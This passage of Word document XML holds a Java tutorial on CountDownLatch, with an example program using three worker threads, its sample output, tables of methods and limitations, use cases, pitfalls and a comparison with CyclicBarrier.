    </w:p>
    <w:p w14:paraId="283F35A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3. Creating a CountDownLatch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF979B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Latch latch = new CountDownLatch(3); // Wait for 3 tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC04B7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1B16C3CD">
          <v:rect id="_x0000_i6740" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="081BB4C1"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4. Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1FD2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import java.util.concurrent.CountDownLatch;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438954A6" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="068146D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public class CountDownLatchExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887541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static void main(String[] args) throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB2A43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Initialize CountDownLatch with a count of 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6253B1D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CountDownLatch latch = new CountDownLatch(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDA84B5" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D21FA6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Creating 3 worker threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B903BC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for (int i = 1; i &lt;= 3; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47520C8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new Thread(new Worker(latch, "Worker-" + i)).start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7323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5C0F4BE3" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51DF3BB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Main thread waiting for workers to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0316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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        System.out.println("Main thread waiting...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8314B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latch.await();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BEF08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All workers finished. Main thread resumes.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601E0D0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7BE7E41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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2753C7" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C5BCF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lass Worker implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EEB74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rivate final CountDownLatch latch;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FAFCF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rivate final String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C62F3F" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460F563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Worker(CountDownLatch latch, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C072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is.latch = latch;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C18D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is.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64320BF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6F0188A6" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E42F8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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5501401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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C05771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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B6B66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name + " started working.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480495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read.sleep((long) (Math.random() * 1000)); // Simulate work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B344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System.out.println(name + " finished.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F604F5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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCFCEF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Thread.currentThread().interrupt();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B447D5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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89BD7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 Decrement the count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835401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latch.countDown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE77F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45133B9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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE23E3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B79917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53626291">
          <v:rect id="_x0000_i6741" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE084D"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5. Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182140C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Main thread waiting...  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFAF3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1 started working.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB2D54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2 started working.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC28D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3 started working.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA83844"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2 finished.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C83795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1 finished.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD218D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Worker-3 finished.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391049E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All workers finished. Main thread resumes.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F0BDB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006C3F61">
          <v:rect id="_x0000_i6742" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA4322"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5684"/>
      </w:tblGrid>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="080A0640" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14DE57A8"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30D5758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324C2450" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039E68B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wait()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F2324E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auses the current thread to wait until the count reaches zero.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="48F0CD1D" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E19DBE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countDown()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31168B7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Decrements the count by one.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="53F9CB92" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58F9A18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getCount()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BB7C47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turns the current count.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31038A1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53C81287">
          <v:rect id="_x0000_i6743" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD46279"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7. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D2B3E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Service Initialization:</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wait for multiple services to start before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D10D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arallel Processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wait for multiple threads to complete processing before aggregating results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CEDF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Database Migration:</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wait for multiple data migration tasks to finish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791E3F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Testing:</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that all setup tasks complete before running tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E430C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3D7B97EA">
          <v:rect id="_x0000_i6744" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47305A9F"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8. Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25116A2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Thread Coordination:</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows efficient thread synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2822B66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Easy to Implement:</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides simple methods for waiting and signaling completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BBA15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lastRenderedPageBreak/>
        <w:t>One-Time Use:</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Perfect for one-time initialization or task coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A963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497FCD44">
          <v:rect id="_x0000_i6745" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D0F074"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9. Lim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0"/>
        <w:gridCol w:w="5706"/>
      </w:tblGrid>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="0F7FC933" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A56862"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Limitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15A25411"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="7F3AB4DD" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="345665C5"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One-Time Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="718B11E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ce the count reaches zero, it cannot be reset.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="289712A3" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A397C7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Manual Decrement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A69D180"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Requires manual invocation of countDown() by the threads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="650F7D94" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46B2C9B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otential Deadlock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53F1246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If a thread does not call countDown(), other threads may hang.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E518D0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46F27AB3">
          <v:rect id="_x0000_i6746" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="399B2AF7"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0. Real-World Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CC2A2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 Application Startup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379437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n application may have multiple services that need to be initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E731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he main application thread waits for all services to complete initialization using CountDownLatch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132160B"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2. Multi-Step Processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098471E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Breaking a large task into subtasks processed concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391340F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The main thread waits for all subtasks to complete before combining the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0934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5F5A0C6D">
          <v:rect id="_x0000_i6747" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F108A"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1. Pitfalls:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA60B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Not Calling countDown():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E0DFF"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Forgetting to call countDown() will make the main thread wait indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BD996"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Not Handling Interruptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E72331"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lways handle InterruptedException to prevent unexpected behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3DBE28"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usability Issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B4D694" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Unlike CyclicBarrier, CountDownLatch cannot be reused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F98C1A2"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1C9BA4EA">
          <v:rect id="_x0000_i6748" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="024943D7"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12. Comparison with CyclicBarr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4169"/>
        <w:gridCol w:w="3795"/>
      </w:tblGrid>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="3F8957C2" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FBC365E"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027E94E3"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ountDownLatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D227FB0"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yclicBarrier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="2098EEB1" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12F88FA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Resets after use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64AB11BE"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No (cannot be reused)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11D48257"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Yes (can be reused)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="47614084" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2609C0CA"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Primary Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F35B99B"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e-time event, waiting for tasks to complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B1E604D"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Synchronizing threads at a common point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="47633725" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78F4D9EC"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Waiting Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="645927FF"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One or more threads wait for a countdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B6045D1"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All threads wait for each other</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44476693"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pict w14:anchorId="1A126D64">
          <v:rect id="_x0000_i6749" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236F0F8" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C70C39" w14:textId="77777777" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CountDownLatch is an effective synchronization tool when you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait for multiple threads to complete</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a task. It is best suited for one-time events, unlike CyclicBarrier, which is reusable. Proper usage requires careful handling of the countdown mechanism to avoid deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FB361F" w14:textId="77777777" w:rsidR="00EE66E8" w:rsidRPr="004F2440" w:rsidRDefault="00EE66E8" w:rsidP="00EE66E8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="589591E8">
          <v:rect id="_x0000_i3929" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
